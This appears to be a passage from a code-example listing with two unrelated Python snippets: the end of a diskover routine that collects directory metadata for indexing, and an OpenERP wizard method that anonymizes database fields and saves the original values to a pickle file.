        uid = lstat_path.st_uid
        # try to get owner user name
        # first check cache
        if uid in uids:
            owner = owners[uid]
        # not in cache
        else:
            try:
                owner = pwd.getpwuid(uid).pw_name.split('\\')
                # remove domain before owner
                if len(owner) == 2:
                    owner = owner[1]
                else:
                    owner = owner[0]
            # if we can't find the owner's user name, use the uid number
            except KeyError:
                owner = uid
            # store it in cache
            if not uid in uids:
                uids.append(uid)
                owners[uid] = owner
        # get group id
        gid = lstat_path.st_gid
        # try to get group name
        # first check cache
        if gid in gids:
            group = groups[gid]
        # not in cache
        else:
            try:
                group = grp.getgrgid(gid).gr_name.split('\\')
                # remove domain before group
                if len(group) == 2:
                    group = group[1]
                else:
                    group = group[0]
            # if we can't find the group name, use the gid number
            except KeyError:
                group = gid
            # store in cache
            if not gid in gids:
                gids.append(gid)
                groups[gid] = group

        inode = lstat_path.st_ino
        hardlinks = lstat_path.st_nlink

        filename = os.path.basename(path)
        parentdir = os.path.abspath(os.path.join(path, os.pardir))
        fullpath = os.path.abspath(os.path.join(parentdir, filename))

        dirmeta_dict = {
            "filename": filename,
            "path_parent": parentdir,
            "filesize": 0,
            "items": 1,  # 1 for itself
            "items_files": 0,
            "items_subdirs": 0,
            "last_modified": mtime_utc,
            "last_access": atime_utc,
            "last_change": ctime_utc,
            "hardlinks": hardlinks,
            "inode": inode,
            "owner": owner,
            "group": group,
            "tag": "",
            "tag_custom": "",
            "crawl_time": 0,
            "change_percent_filesize": "",
            "change_percent_items": "",
            "change_percent_items_files": "",
            "change_percent_items_subdirs": "",
            "worker_name": worker_name,
            "indexing_date": indextime_utc,
            "_type": "directory"
        }

        # check plugins for adding extra meta data to dirmeta_dict
        for plugin in diskover.plugins:
            try:
                # check if plugin is for directory doc
                mappings = {'mappings': {'directory': {'properties': {}}}}
                plugin.add_mappings(mappings)
                dirmeta_dict.update(plugin.add_meta(fullpath))
            except KeyError:
                pass

        # add any autotags to dirmeta_dict
        if cliargs['autotag'] and len(diskover.config['autotag_dirs']) > 0:
            auto_tag(dirmeta_dict, 'directory', mtime_unix, atime_unix,
                     ctime_unix)

        # search for and copy over any existing tags from reindex_dict
        for sublist in reindex_dict['directory']:
            if sublist[0] == fullpath:
                dirmeta_dict['tag'] = sublist[1]
                dirmeta_dict['tag_custom'] = sublist[2]
                break

    except (IOError, OSError):
        return None

    # cache directory times in Redis, encode path (key) using base64
    if diskover.config['redis_cachedirtimes'] == 'True' or diskover.config[
            'redis_cachedirtimes'] == 'true':
        redis_conn.set(base64.encodestring(
            path.encode('utf-8', errors='ignore')),
                       mtime_unix + ctime_unix,
                       ex=diskover.config['redis_dirtimesttl'])

    return dirmeta_dict
示例#60
0
    def anonymize_database(self, cr, uid, ids, context=None):
        """Sets the 'anonymized' state to defined fields"""

        # create a new history record:
        anonymization_history_model = self.pool.get(
            'ir.model.fields.anonymization.history')

        vals = {
            'date': datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S'),
            'state': 'started',
            'direction': 'clear -> anonymized',
        }
        history_id = anonymization_history_model.create(cr, uid, vals)

        # check that all the defined fields are in the 'clear' state
        state = self.pool.get(
            'ir.model.fields.anonymization')._get_global_state(cr,
                                                               uid,
                                                               context=context)
        if state == 'anonymized':
            self._raise_after_history_update(
                cr, uid, history_id, _('Error !'),
                _("The database is currently anonymized, you cannot anonymize it again."
                  ))
        elif state == 'unstable':
            msg = _("The database anonymization is currently in an unstable state. Some fields are anonymized," + \
                  " while some fields are not anonymized. You should try to solve this problem before trying to do anything.")
            self._raise_after_history_update(cr, uid, history_id, 'Error !',
                                             msg)

        # do the anonymization:
        dirpath = os.environ.get('HOME') or os.getcwd()
        rel_filepath = 'field_anonymization_%s_%s.pickle' % (cr.dbname,
                                                             history_id)
        abs_filepath = os.path.abspath(os.path.join(dirpath, rel_filepath))

        ir_model_fields_anonymization_model = self.pool.get(
            'ir.model.fields.anonymization')
        field_ids = ir_model_fields_anonymization_model.search(
            cr, uid, [('state', '<>', 'not_existing')], context=context)
        fields = ir_model_fields_anonymization_model.browse(cr,
                                                            uid,
                                                            field_ids,
                                                            context=context)

        if not fields:
            msg = "No fields are going to be anonymized."
            self._raise_after_history_update(cr, uid, history_id, 'Error !',
                                             msg)

        data = []

        for field in fields:
            model_name = field.model_id.model
            field_name = field.field_id.name
            field_type = field.field_id.ttype
            table_name = self.pool[model_name]._table

            # get the current value
            sql = "select id, %s from %s" % (field_name, table_name)
            cr.execute(sql)
            records = cr.dictfetchall()
            for record in records:
                data.append({
                    "model_id": model_name,
                    "field_id": field_name,
                    "id": record['id'],
                    "value": record[field_name]
                })

                # anonymize the value:
                anonymized_value = None

                sid = str(record['id'])
                if field_type == 'char':
                    anonymized_value = 'xxx' + sid
                elif field_type == 'selection':
                    anonymized_value = 'xxx' + sid
                elif field_type == 'text':
                    anonymized_value = 'xxx' + sid
                elif field_type == 'boolean':
                    anonymized_value = random.choice([True, False])
                elif field_type == 'date':
                    anonymized_value = '2011-11-11'
                elif field_type == 'datetime':
                    anonymized_value = '2011-11-11 11:11:11'
                elif field_type == 'float':
                    anonymized_value = 0.0
                elif field_type == 'integer':
                    anonymized_value = 0
                elif field_type in [
                        'binary', 'many2many', 'many2one', 'one2many',
                        'reference'
                ]:  # cannot anonymize these kind of fields
                    msg = _(
                        "Cannot anonymize fields of these types: binary, many2many, many2one, one2many, reference."
                    )
                    self._raise_after_history_update(cr, uid, history_id,
                                                     'Error !', msg)

                if anonymized_value is None:
                    self._raise_after_history_update(
                        cr, uid, history_id, _('Error !'),
                        _("Anonymized value can not be empty."))

                sql = "update %(table)s set %(field)s = %%(anonymized_value)s where id = %%(id)s" % {
                    'table': table_name,
                    'field': field_name,
                }
                cr.execute(sql, {
                    'anonymized_value': anonymized_value,
                    'id': record['id']
                })

        # save pickle:
        fn = open(abs_filepath, 'w')
        pickle.dump(data, fn, pickle.HIGHEST_PROTOCOL)

        # update the anonymization fields:
        values = {
            'state': 'anonymized',
        }
        ir_model_fields_anonymization_model.write(cr,
                                                  uid,
                                                  field_ids,
                                                  values,
                                                  context=context)

        # add a result message in the wizard:
        msgs = [
            "Anonymization successful.",
            "",
            "Donot forget to save the resulting file to a safe place because you will not be able to revert the anonymization without this file.",
            "",
            "This file is also stored in the %s directory. The absolute file path is: %s.",
        ]
        msg = '\n'.join(msgs) % (dirpath, abs_filepath)

        fn = open(abs_filepath, 'r')

        self.write(cr, uid, ids, {
            'msg': msg,
            'file_export': base64.encodestring(fn.read()),
        })
        fn.close()

        # update the history record:
        anonymization_history_model.write(
            cr, uid, history_id, {
                'field_ids': [[6, 0, field_ids]],
                'msg': msg,
                'filepath': abs_filepath,
                'state': 'done',
            })

        # handle the view:
        view_id = self.pool['ir.model.data'].xmlid_to_res_id(
            cr, uid,
            'anonymization.view_ir_model_fields_anonymize_wizard_form')

        return {
            'res_id': ids[0],
            'view_id': [view_id],
            'view_type': 'form',
            "view_mode": 'form',
            'res_model': 'ir.model.fields.anonymize.wizard',
            'type': 'ir.actions.act_window',
            'context': {
                'step': 'just_anonymized'
            },
            'target': 'new',
        }